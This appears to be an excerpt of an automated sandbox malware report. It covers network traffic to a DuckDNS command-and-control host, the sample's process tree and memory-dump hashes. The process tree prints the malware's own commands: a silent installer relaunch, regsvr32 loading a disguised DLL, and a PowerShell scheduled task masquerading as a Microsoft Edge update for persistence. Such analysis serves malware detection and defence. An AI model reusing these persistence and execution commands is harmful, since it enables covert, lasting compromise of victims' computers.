                                                                              Dec 10, 2024 07:02:11.820197105 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.921926975 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.922141075 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.922151089 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:11.922645092 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.035489082 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.035501957 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.035507917 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.036554098 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.137151957 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.137912035 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.137921095 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.237695932 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.237801075 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.251944065 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.251955986 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.251961946 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.338509083 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.338536024 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.338623047 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.338783979 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.352361917 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.352509022 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.352603912 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.440685034 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.453155994 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.453243971 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.540316105 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.553911924 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.553924084 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.553930044 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.554116011 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.639121056 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.656157017 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.656169891 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.737202883 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.737359047 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.755640984 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.755687952 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.755716085 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.838726997 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.854435921 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.854448080 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.939310074 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.939476013 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:12.952635050 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.952903032 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:12.953152895 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:13.038114071 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:13.054112911 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:13.054131031 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:13.054136992 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:13.154723883 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:13.154978037 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:13.166457891 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:13.166613102 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:13.253693104 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:13.253739119 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:13.271172047 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:13.271294117 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:13.371263981 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:13.371433973 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:13.381968975 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:13.382277966 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:13.382318020 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:13.471704006 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:13.471894026 CET4976256001192.168.11.2088.99.161.62
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 10, 2024 07:00:58.414688110 CET192.168.11.201.1.1.10x75aeStandard query (0)1hvnc.duckdns.orgA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 10, 2024 07:00:58.567433119 CET1.1.1.1192.168.11.200x75aeNo error (0)1hvnc.duckdns.org88.99.161.62A (IP address)IN (0x0001)false

                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:01:00:12
                                                                              Start date:10/12/2024
                                                                              Path:C:\Users\user\Desktop\i9DKxTZoVd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\i9DKxTZoVd.exe"
                                                                              Imagebase:0x400000
                                                                              File size:1'336'796 bytes
                                                                              MD5 hash:108B6783FB581F9F9CE33936379EE0CD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:01:00:12
                                                                              Start date:10/12/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmp
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmp" /SL5="$1041C,956295,140800,C:\Users\user\Desktop\i9DKxTZoVd.exe"
                                                                              Imagebase:0x400000
                                                                              File size:1'160'704 bytes
                                                                              MD5 hash:14C6FA8E50B4147075EB922BD0C8B28D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Antivirus matches:
                                                                              • Detection: 2%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:01:00:13
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\i9DKxTZoVd.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                              Imagebase:0x5c0000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:01:00:13
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6af2b0000
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:01:00:13
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:timeout /T 3
                                                                              Imagebase:0x230000
                                                                              File size:25'088 bytes
                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:01:00:16
                                                                              Start date:10/12/2024
                                                                              Path:C:\Users\user\Desktop\i9DKxTZoVd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\i9DKxTZoVd.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                              Imagebase:0x400000
                                                                              File size:1'336'796 bytes
                                                                              MD5 hash:108B6783FB581F9F9CE33936379EE0CD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:01:00:16
                                                                              Start date:10/12/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp" /SL5="$20468,956295,140800,C:\Users\user\Desktop\i9DKxTZoVd.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                              Imagebase:0x400000
                                                                              File size:1'160'704 bytes
                                                                              MD5 hash:14C6FA8E50B4147075EB922BD0C8B28D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Antivirus matches:
                                                                              • Detection: 2%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:01:00:16
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\Swallow.dat"
                                                                              Imagebase:0x960000
                                                                              File size:20'992 bytes
                                                                              MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:9
                                                                              Start time:01:00:16
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\Swallow.dat"
                                                                              Imagebase:0x7ff6d2710000
                                                                              File size:25'088 bytes
                                                                              MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:10
                                                                              Start time:01:00:21
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }"
                                                                              Imagebase:0x7ff7c94f0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:01:00:21
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6af2b0000
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:01:00:27
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AF4B0CC-A257-4A7E-E201-D5DF536679FB}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
                                                                              Imagebase:0x7ff7c94f0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:01:00:27
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6af2b0000
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:01:00:29
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat
                                                                              Imagebase:0x7ff6d2710000
                                                                              File size:25'088 bytes
                                                                              MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:01:00:35
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }"
                                                                              Imagebase:0x7ff7c94f0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:16
                                                                              Start time:01:00:35
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6af2b0000
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Reset < >
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.101808651797.00007FFB5B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B8A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffb5b8a0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fed4e4a74d973d8650095ef2dcc339da299e968bfa0b53ef97527ccbce5c7e23
                                                                                • Instruction ID: fdb7576e4b4d0fa6ce74ff1e24f6ae5b5e1f1e4182f404a0673e15ceb6669a03
                                                                                • Opcode Fuzzy Hash: fed4e4a74d973d8650095ef2dcc339da299e968bfa0b53ef97527ccbce5c7e23
                                                                                • Instruction Fuzzy Hash: 6C31087190CB884FDB59DA6C8C4A2F93FE0EB96321F04827FD188C71A7D965581AC791
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.101808651797.00007FFB5B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B8A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffb5b8a0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bdf0994e91668dba0fac93c8fcf7497c68f74a253fe68634803d87cb3edf3e08
                                                                                • Instruction ID: 9969aaf656f715d1d947bf3c1a7702a03495b27e3b9ef5a7fcdcef2c5aebccbe
                                                                                • Opcode Fuzzy Hash: bdf0994e91668dba0fac93c8fcf7497c68f74a253fe68634803d87cb3edf3e08
                                                                                • Instruction Fuzzy Hash: 4D7149B6A0DF854FE7054A7C985A0F43FA1EF52320F0842BBD0C88B1E7D9286C068796
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.101808032875.00007FFB5B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B78D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffb5b78d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c6bfbb4082011321c187fe68c13eaeee690fcc2401f448b727625ddcbed916f4
                                                                                • Instruction ID: 69e504e976332539054963545527f1b1c18e3959d52c333e033ced575eb05644
                                                                                • Opcode Fuzzy Hash: c6bfbb4082011321c187fe68c13eaeee690fcc2401f448b727625ddcbed916f4
                                                                                • Instruction Fuzzy Hash: 5741C2B140DBC44FE7978B389855A523FB0EF56320B1945DFE088CB1A7D629A846C792
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.101808651797.00007FFB5B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B8A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffb5b8a0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d6ab1351f01921192a4484a8dc8bd2cd8c5e113e0c24d4ad837c7bbd034a6c60
                                                                                • Instruction ID: 1e694ce0e817e9889de53fd90cef0e2f15737d97856cda206e1182ba78d51303
                                                                                • Opcode Fuzzy Hash: d6ab1351f01921192a4484a8dc8bd2cd8c5e113e0c24d4ad837c7bbd034a6c60
                                                                                • Instruction Fuzzy Hash: 7801677151CB0C4FD744EF0CE451AA5B7E0FB95324F10066DE58AC3665DA36E892CB45
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.101809243020.00007FFB5B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffb5b970000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b60d0de6326762fd27bd5d9994edf28f49e1cbbbb7cb46c3b5bf6d6678242639
                                                                                • Instruction ID: 30132026bb49150a90e2e87b244eba6458c24f97341ec446d095fc630f3f9e4c
                                                                                • Opcode Fuzzy Hash: b60d0de6326762fd27bd5d9994edf28f49e1cbbbb7cb46c3b5bf6d6678242639
                                                                                • Instruction Fuzzy Hash: 90F05472A0C6494FD758EB5CE4465A877E0FF4532075840B7E18DC7577DA2AAC42C784
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.101808651797.00007FFB5B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B8A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffb5b8a0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1d2901c6a704f490266f926cec3212551609e433a48be33fbde3e183a683019b
                                                                                • Instruction ID: fa8368d1d0766544bf75c3b2dbecec10635a06ac11b45b34b72db70c298db00b
                                                                                • Opcode Fuzzy Hash: 1d2901c6a704f490266f926cec3212551609e433a48be33fbde3e183a683019b
                                                                                • Instruction Fuzzy Hash: 78F0F6758086898FEB069F24C8599E57FA0EF26310B040297E458C71B2DB649854C7D2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.101809243020.00007FFB5B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffb5b970000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6d4b0a1074734935300aed9e34bfcce58bbf754a867ffdbd4d591eff0488760c
                                                                                • Instruction ID: 4dcebae406cb2ce42ff207ec9164c4c4d30ea5ac764b1566daa95ca5ab333ebe
                                                                                • Opcode Fuzzy Hash: 6d4b0a1074734935300aed9e34bfcce58bbf754a867ffdbd4d591eff0488760c
                                                                                • Instruction Fuzzy Hash: E8F05E72A0C6498FD758EB6CE4425E877E0FF05320B5840B6E18DCB473DA2AAC41C740
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.101916752489.00007FFB5B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B980000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_7ffb5b980000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 349e848d9bef91bca064fd139e0a531918d7e7191d65c7f3e8f9aa01f99b474b
                                                                                • Instruction ID: bc5fc1d3c5ba54a1c9ab8248f415fb794f54a474fb73629fa483cf701b93bbc7
                                                                                • Opcode Fuzzy Hash: 349e848d9bef91bca064fd139e0a531918d7e7191d65c7f3e8f9aa01f99b474b
                                                                                • Instruction Fuzzy Hash: B0511692A0DBC90FD3969A3CD8655647FE1DF56310B0941FFE089CB2E7D909AC48C381
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.101915582457.00007FFB5B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B8B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_7ffb5b8b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0752a8a1262e70e8f44ec6a41cbcc5b4f506a664ef2e74bdeea2679e94cfd2df
                                                                                • Instruction ID: f912db2fbfc4b5cc242094205c2575c9b4039ec8169009847a04dd72f3eef24b
                                                                                • Opcode Fuzzy Hash: 0752a8a1262e70e8f44ec6a41cbcc5b4f506a664ef2e74bdeea2679e94cfd2df
                                                                                • Instruction Fuzzy Hash: E131047091CB488FDB099F5CD84A6A87BE0FB99320F04426FE449C3262DB74A855CBC2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.101913937817.00007FFB5B79D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B79D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_7ffb5b79d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fa853db7c4898d9dde667872d16923305ff3105f744ee4001ab4aa8d9a03d4f8
                                                                                • Instruction ID: 7824fe91e0c6cd6d87930bca5755a66269ca1a97b6738af7adccd7bfca2ccfc7
                                                                                • Opcode Fuzzy Hash: fa853db7c4898d9dde667872d16923305ff3105f744ee4001ab4aa8d9a03d4f8
                                                                                • Instruction Fuzzy Hash: 1741CF7180DBC44FE7569B38D841A523FF0EF52320F1905EBD088CB1B7D629A84ACB92
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.101915582457.00007FFB5B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B8B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_7ffb5b8b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2df8b734068d81eece27e3235f15f70ab886ac2b22223eea45151bcb2e733239
                                                                                • Instruction ID: 2004fdea6f6bb5eb6bebeface60751c7b4791b887be459c5d7ddffe9a7c840e8
                                                                                • Opcode Fuzzy Hash: 2df8b734068d81eece27e3235f15f70ab886ac2b22223eea45151bcb2e733239
                                                                                • Instruction Fuzzy Hash: 09213A7190CA4C8FDB59DFACD84A7E97BE0EB9A321F04816FD048C3152C674644ACB91
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.101915582457.00007FFB5B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B8B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_7ffb5b8b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e26e880e1d71fe7436f510caca523963cd19ce89c1addea80b81cc1ac8720924
                                                                                • Instruction ID: 7bfa5ff863b3d468a15e32b9328bb66b38d8306a6e1f7bd1906714c657015a01
                                                                                • Opcode Fuzzy Hash: e26e880e1d71fe7436f510caca523963cd19ce89c1addea80b81cc1ac8720924
                                                                                • Instruction Fuzzy Hash: 6B01677151CB0C4FD748EF0CE451AA6B7E0FB95324F10056EE58AC36A5DA36E892CB45
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.101915582457.00007FFB5B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B8B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_7ffb5b8b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a0c60b0ecdeb965c074a618e397dba33afa51d5efeee396229274115745ff901
                                                                                • Instruction ID: 6535c3d2cd0ee5c07557954fa15f5852c9899cdcf7ff16bb653e5fbe7b822fbc
                                                                                • Opcode Fuzzy Hash: a0c60b0ecdeb965c074a618e397dba33afa51d5efeee396229274115745ff901
                                                                                • Instruction Fuzzy Hash: 0CF02B758086898FDB06DF3488555D57FE0FF16310B0902D7E458C71B2DB799858C7C2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.101916752489.00007FFB5B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B980000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_7ffb5b980000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7c8fddd2df4f7a7ef305da5270ef3a6b38129f8f623d5d27afa44daa6217565d
                                                                                • Instruction ID: a2da41564fff74dc5b76a10d9215f58ae4d4ed9436f85f153b6dc08a255ae79a
                                                                                • Opcode Fuzzy Hash: 7c8fddd2df4f7a7ef305da5270ef3a6b38129f8f623d5d27afa44daa6217565d
                                                                                • Instruction Fuzzy Hash: E9F05E72A0C6498FD799EA6CE4464A877E0EF45320B1940BAE19DC7573CA29EC41C784
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.101916752489.00007FFB5B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B980000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_7ffb5b980000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
